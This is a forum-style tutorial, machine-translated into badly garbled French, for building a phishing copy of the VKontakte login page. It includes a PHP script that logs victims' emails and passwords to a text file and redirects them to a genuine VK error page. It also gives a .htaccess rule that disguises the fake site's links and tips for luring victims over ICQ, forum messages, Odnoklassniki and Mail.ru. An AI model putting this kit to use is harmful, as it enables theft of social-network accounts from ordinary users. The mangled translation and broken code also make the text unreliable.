Faux fouet jusqu'à

[INTRO]

Il y avait nechago, il faisait nuit .... En fait sur mon premier article (le premier dans le antichate), m'a tiré par le fait que , en vertu d' achat / vente / échange / jeter à grande ont un thème dans lequel déjà un Hecker prodovat fakie sur 10 VSW, et sont souvent invités à créer un ou l'autre faux ...
Je vous dis un article comment vous pouvez faux zabatsat presque universelle sous tout ce qui ugondo! Illustrer Faika VKontakte.

[Searching]

Et donc, celui que nous devons faire est de sélectionner zhertvoresurs et de recueillir tout ce que nous avions besoin d' informations et nous avons seulement besoin de copier certains stranits.Idem sur vkontakte.ru par operu (!). entrée bouton Zhmyakaem, arriver à login.php, et le prendre comme un indice de nos faux. Hit dans l'opéra: FILE -> Enregistrer sous -> Dans la boîte de dialogue intitulée choisissez " l' image de fichier HTML" (le réglage par défaut est Web Archive ....), et le nombre sautée fichier index Nom d'écriture (ou login.htm - en fonction de la page)


Suivant pour introduire des données irréaliste et accéder à la page sur laquelle il est écrit
Cette adresse e-mail est pas enregistré, ou un mot de passe incorrect.
Enregistrez - le de la même manière, qui est l' indice eul au lieu d'écrire mauvais.
essayer plus de conduire dans la glace Google.ru Vkontakte.ru, cliquez sur Autres résultats de vkontakte.ru »et quelque chose à voir avec Ischim contact erorom ... J'ai trouvé à la page de vtoryo VKontakte | Erreur (http://vkontakte.ru/blank.php?code=10)- souviens nous avons besoin ce lien
Tronqué, tout ce que nous avons besoin pour les contrefaçons de la ressource que nous avons déjà.

[Codage]

Tux formulaire de connexion maintenant isleduem. Ouvrez votre index.html et la recherche d'un formulaire de connexion.
 <Form method = "post" name = "login" id = "login" action = "login.php">

  <Input type = "hidden" name = id = valeur "success_url" "de success_url" = "">
  <Input type = "hidden" name = id = valeur "fail_url" "de fail_url" = "">

  <Input type = "hidden" name = id = valeur "try_to_login" "try_to_login" = "1">
  <Table align = "center" cellpadding = 0 cellspacing = 7 border = 0 width = "40%">

  <Tr>
  <Largeur Td = "100px">
  <Span class = "gray"> Email: </ span>
  </ Td>
  <Td>

  <Class = type = "text" name = valeur d'entrée "inputText" "email" = "" id = "" size = "e-mail 25" />

  <Td>
  </ Tr>
  <Tr>
  <Td>
  <Span class = "gray"> Mot de passe: </ span>

  </ Td>
  <Td>
  <Classe d'entrée = "inputText" type = nom "password" = value = "" id = "" size = "" pass "passe 25" />

  </ Td>
  </ Tr>
 
  <Tr>
  <Td>
  & Nbsp;
  </ Td>
  <Td>

  <Input style = "margin-top: 1px; vertical-align: middle;"  type = "checkbox" name = "expire" id = "expire" value = "1" /> <small> Shared Computer </ small>

  </ Td>
  </ Tr>
  <Tr>
  <Td>
  & Nbsp;
  </ Td>
  <Td>
rappelez - vous donc 3 choses:
<Form method = "post" name = "login" id = "login" action = "login.php">
<Class = type = "text" name = valeur d'entrée "inputText" "email" = "" id = "" size = "e-mail 25" />
<Input class = "inputText" Type = name "password" = value = "" id = "" size = "" pass "passe 25" />
Il est dans ces 3 choses zaklyuchaetsya première partie de l'unicité de toute sphère sociale, ou E-mail ou un autre, la forme importe où vous identifier (sur le terrain) sera dans le VD (bien uniquement les champs Nom réveille varient), par exemple de camarades de classe est
<Entrée id = valeur "field_password" = "" style = "width: 170px;" type = taille "password" = nom "20" = "de st.password">
Dire juste champs otlichaetsya de nom, des éléments de conception, mais la fonction est une seule et même.
Maintenant , nous créons un fichier php et nommez - le par exemple login.php, son contenu:

PHP Code:
  <? Php
 

/ *
#############
# By_NoNameZ #
###########
* /
$ F = fopen ( "log.txt" , "à");
flock ($ f, 2);
if (preg_match ( "/^([.0-9a-z_-]+)@(([0-9a-z-]+\.)+[0-9a-z]{2,4})$/ i ", $ _POST [ 'email ']) &&! empty ($ _POST [ 'password'])) {
fputs ($ f, $ _POST [ 'email']. ";". $ _POST [ 'password'] "\ n".);
header ( "Location: http: // ");
} Else {
header ( "Location: http: // ");
}
flock ($ f, 3);
fclose ($ f);
?>
En fait, en regardant le script, un couple strocheg, mais il est faux tout à fait normal, il dispose:
Stocker les variables de transmission et leur vérification, en fonction de la vérification de redirection.

Donc, maintenant de retour aux 3 lignes:
<Form method = "post" name = "login" id = "login" action = "login.php">
ici nous avons tout en ordre, le nom du script sovpodaet leur nom, nobyvaet qui ne correspond pas, remplacez-le ou pereiminovyvaem nôtre.
<Class = type = "text" name = valeur d'entrée "inputText" "email" = "" id = "" size = "e-mail 25" />
<Classe d'entrée = "inputText" type = nom "password" = value = "" id = "" size = "" pass "passe 25" />
Par conséquent, nous avons besoin de nommer = "email" et name = "pass"
Nous les avons mis dans notre script dans le bon endroit
  <? Php
 

/ *
#############
# By_NoNameZ #
###########
* /
$ F = fopen ( "log.txt" , "à");
flock ($ f, 2);
if (preg_match ( "/^([.0-9a-z_-]+)@(([0-9a-z-]+\.)+[0-9a-z]{2,4})$/ i ", $ _POST [ 'email ']) &&! empty ($ _POST [ 'pass'])) {
fputs ($ f, $ _POST [ 'email']. ";". $ _POST [ 'pass'] "\ n".);
header ( "Location: http: // ");
} Else {
header ( "Location: http: // ");
}
flock ($ f, 3);
fclose ($ f);
?>
Qui n'a pas remarqué, il est $ _POST [ 'email'] et $ _POST [ 'pass']

Ensuite, regardez le grincement, alors fonctionner Stait SI AUTRE, et pregmatch, à savoir si le champ rencontre le E-mail E-mail (ника@мыло.ру, et non comme un yvpmdvgk d'entraînement), et le champ de mot de passe ne soit pas vide, alors la réalisation de la première redirection, si le courriel ne correspond pas ou passer champ vide, puis la seconde redirection. Il en résulte que si Chell est entré quelque chose de similaire à passer du savon et ensuite jeter sur la page erorom http://vkontakte.ru/blank.php?code=10, et si elles sont introduites des déchets (et ici nous avions besoin copier la page bad.html? quand nous sommes entrés les données erronées), puis de le renvoyer, soit nous entrons bad.htm.

PHP Code:
  <? Php
 

/ *
#############
# By_NoNameZ #
###########
* /
$ F = fopen ( "log.txt" , "à");
flock ($ f, 2);
if (preg_match ( "/^([.0-9a-z_-]+)@(([0-9a-z-]+\.)+[0-9a-z]{2,4})$/ i ", $ _POST [ 'email ']) &&! empty ($ _POST [ 'pass'])) {
fputs ($ f, $ _POST [ 'email']. ";". $ _POST [ 'pass'] "\ n".);
header ( "Location: http://vkontakte.ru/blank.php?code=10") ;
} Else {
header ( "Location: bad.htm") ;
}
flock ($ f, 3);
fclose ($ f);
?>
Sohranyaem.Zalivaem tous les serveurs Labuda (login.php, index.htm + dossier avec les fichiers, bad.htm + dossier avec des fichiers), créer log.txt fayil (je vous conseille de venir avec un nom unique. Et ne pas oublier de changer le script), mis sur il chmod777.

3) une petite mise à jour ...

Cette mise à jour est très approprié pour le SI, de créer un fichier .htaccess mis en évidence avec le contenu suivant à la racine sur ftp:

RewriteEngine On
RewriteCond% {REQUEST_FILENAME}! -f
RewriteCond% {REQUEST_URI} Index \! .htm
RewriteRule (. *) Index.htm? [QSA]

ATTENTION !!!
! Index \ .htm -Au Fail ssylaetsya redirect, si vous dites faux login.html. donc vous devez vous identifier pereiminovat index.

Tux, le lien Fail nous donne une meilleure gazliva de qualité, à savoir:
vashfeyk.ru / tout texte, la structure des liens tobish sachant sogdavaemogo faux, par exemple le contact, nous pouvons le faire:


vashfeyk.ru / photos.php? act = show & id = 15884695_588954334 & uid = 359648756 & self = 6
et le gouvernement provisoire est par ICQ))) sont d'accord. maintenant faux moins perceptible))

C'est tout

[La fin] En fait, qui est unique, et le fait que vous pouvez aller à des camarades de classe, juste enregistrer la page, entrez une variable, remplacer les URL (qui est juste de donner http://odnoklassniki.ru/dk?st.cmd=error) et tout simplement obsolyutno aller à mayil.ru, maintenir et remplacer les variables et tous))) la seule chose que vous pourriez avoir besoin est la créativité, dobustim pas enregistrer la page d'accueil, et la page vhoda.Vy peut aussi faire un forum, si vous voulez laisser le aCC ( envoyer un PM
<a href="feyk"> lien sur </a>
Et en fausse préciser le sujet pour la redirection.